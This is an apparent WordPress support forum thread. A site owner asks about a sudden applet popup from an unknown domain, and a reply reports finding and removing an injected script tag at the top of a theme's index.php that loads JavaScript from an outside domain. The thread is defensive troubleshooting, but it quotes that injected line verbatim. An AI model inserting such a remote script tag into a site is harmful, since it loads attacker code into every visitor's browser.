Pop Up Coming Up All Of A Sudden

  • I’m receiving an applet popup that is coming up on my site. This just started happening today. I’ve deleted my posts from today to see if that would solve it, but to no avail.

    The popup says: An applet from “advancedqualitysystem.com” is requesting access to your computer. The digital signature could not be verified. When I hit Deny, it keeps popping up and only when I go to my website. When I close out of my website it goes away. I have not gone to that site, nor had I ever even heard of it before.

    Any suggestions on how I can fix this?

  • Just had this happen to a client’s account earlier today.

    This line: <script type=”text/javascript” src=”https://geistsweden.eu/wp-cache/”></script&gt;

    was at the top of the index.php file of the site’s theme. I deleted that line so that <?php became line 1 and this seems to have fixed the issue.

    I will go through esmi’s instructions above to make sure the bug is gone for good, not sure what caused this (probably a bad plugin).
